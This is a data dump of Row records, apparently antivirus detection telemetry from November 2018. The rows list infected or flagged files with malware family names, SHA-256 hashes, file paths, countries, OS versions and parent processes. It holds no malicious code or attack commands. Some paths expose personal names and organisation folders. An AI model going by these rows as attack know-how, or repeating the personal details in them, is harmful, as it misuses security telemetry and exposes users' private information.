  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T05:55:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bhctrl32.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Bonjoiur Host Controller\\bhctrl32.exe', filesize=256000, name='RKit/Agent.marf.#M1.#R1'), hash='829ff334cdcfe87bbe5780fb8e696d8fa45420845c6d50dd1d29d0d2ead41b2a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:41:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161459-e94c4b1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161459-E94C4B1C', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='17a47a4fed25a13302f4391b35f928a044058cb35562ff1487f269af32f3a1a3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:14:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210207-5b0d2c97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78e4220c\\AVSCAN-20181101-205936-4C913F24\\AVSCAN-20181101-210207-5B0D2C97', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:02:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='krc4comm.exe', filepath='\\\\?\\F:\\01 FIWAtec\\03 Daten\\03 Roboter\\04 KUKA\\VKRC\\02 KUKA VKRC Versionen\\KUKA VKRC2\\5.4 HF 13_ INGO\\tools\\KRC4CommT\\KRC4Comm\\KRC4Comm.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='378813afcb0b1470e62cb5fb633febad686f1db0c7d8bdcb5db95287f7a063e8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:53:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:02:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='6bac8dcd57b753b26c2d7d0f44cc0b0226e253c9', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\6bac8dcd57b753b26c2d7d0f44cc0b0226e253c9', filesize=1408000, name='W32/Infector.Gen8.#M300.#R700734'), hash='659987ec49e8c9002786b665efcf258fca6fce69d6612e2d563d45414b18e32f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T04:10:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:49:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8544.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8544.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:02:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002507-49a1ba25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002507-49A1BA25', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185820-0a1dcf72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b81c3251\\AVSCAN-20181101-185717-00BBA518\\AVSCAN-20181101-185820-0A1DCF72', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:58:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000074b', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp0000074b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0007dd9a', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp0007dd9a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:44:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053512-2a1770f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053512-2A1770F4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:35:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:47:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='addmcat.exe', filepath='D:\\pc drivers\\DP_Sound_Creative_13101 pult out\\Gigabyte\\AllNT\\GB2\\Driver\\I386\\Addmcat.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='312edb0dcd33534a2d27e6107d99f7ca21c67fd806cce1d21eab5e7b6696bdfe', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T10:13:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ugolino laura.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\UGOLINO LAURA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3137.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3137.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d8cbbf1983e20992f912ce106776521fd206ccdd22ea1416ffea1c1fb9cd0730', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\D8CBBF1983E20992F912CE106776521FD206CCDD22EA1416FFEA1C1FB9CD0730', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d8cbbf1983e20992f912ce106776521fd206ccdd22ea1416ffea1c1fb9cd0730', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:13:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ocs_v71b.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\user\\AppData\\Local\\Temp\\OCS\\ocs_v71b.exe.vir', filesize=320000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:03:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmic.exe', filepath='D:\\Backup\\Windows\\system32\\dllcache\\wmic.exe', filesize=576000, name='W32/Sality.AT.#M1.#R1'), hash='babb25f1a9d83b515bb5545dd89387d561d4a64030a3d66f560c657e61ff7a75', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:11:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='informatica.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212707-0ab64ee9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212707-0AB64EE9', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:27:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094859-afecb1dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-094836-AAD64268\\AVSCAN-20181101-094859-AFECB1DD', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:52:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213607-5939faee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213607-5939FAEE', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:36:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ce2d00fc78be085e5c3721af4a2925bc05fceb1ccf90c5c603399e2efc597e5b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115901-532e4dd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b7ea14e\\AVSCAN-20181101-115513-3A15D0C1\\AVSCAN-20181101-115901-532E4DD2', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:59:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d35112f8c0292ce04ccea68a37747fd9270f5901c6d566c65fe7249499fdc72b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\D35112F8C0292CE04CCEA68A37747FD9270F5901C6D566C65FE7249499FDC72B', filesize=176000, name='W32/Neshta.A.#M1.#R1'), hash='d35112f8c0292ce04ccea68a37747fd9270f5901c6d566c65fe7249499fdc72b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:41:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.bat', filepath='C:\\uepdorimdg.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autopatch.exe', filepath='\\\\?\\C:\\Program Files\\Gamania\\GamaniaSafe\\AutoPatch.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='d56c4ac37710b87ffb319a706ec10b950f7ce93c665dfb216a63ba9cdf62073e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:23:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='moduli gestione faldoni corsi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\MODULI 2016-2017\\MODULI GESTIONE FALDONI CORSI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dba8478c09a129961f136ce9c7637c7123fc58d598ff7c7ea69de87160ded126', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\DBA8478C09A129961F136CE9C7637C7123FC58D598FF7C7EA69DE87160DED126', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='dba8478c09a129961f136ce9c7637c7123fc58d598ff7c7ea69de87160ded126', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:11:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='koperasi.exe', filepath='D:\\pindahan\\Pembukuan\\KSP\\Software Koperasi 3in1-160509\\Koperasi.exe', filesize=25088000, name='W32/Sality.AT.#M1.#R1'), hash='f29ab66293b3aaf5507945d4bf7521644b58baa8fe0d6dadabf3ddb3d4a33f01', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:08:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='61418.html', filepath='D:\\云赚打码\\cache\\businessidresultpage\\5254342440413\\61418.html', filesize=240000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='d6823ed41650671a2a3c9b6bab5d579535717f7fa7dcdbb71c186ad9e2f92c40', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Program Files\\360se6\\Application\\360se.exe', parentsize=1190472, timestamp='2018-11-01T01:33:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\zjeemt5fuic\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:54:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='logreader.exe', filepath='E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-04T08:51:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T14:18:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161925-dd97c8e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161925-DD97C8E4', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:19:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eicfg_remover.exe', filepath='D:\\برامج\\WinSetupFromUSB-1-4\\files\\tools\\winisoutils\\eicfg_remover.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9cba6504cd86e5e82780453c49cf9ceebd97f138ab5c45db00b05dd08a80ef74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:11:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023d83', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023d83', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:41:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:50:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152656-6c1d44fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-152656-6C1D44FB', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:26:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-06-16-44.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T01:37:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0348668.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0348668.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:43:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lpk.dll', filepath='D:\\songs2017\\New folder (2)\\gta   7\\lpk.dll', filesize=320000, name='TR/Nitol.blanu.#M1.#R1'), hash='8c1136d1fc2225d0dfd1ba05598ac89630dc8f40032282f06e76c1c923c59d3c', metadata=Row(cmdline='rtp', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-04T05:02:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-04T11:06:53Z'), dt=datetime.date(2018, 11, 4)),
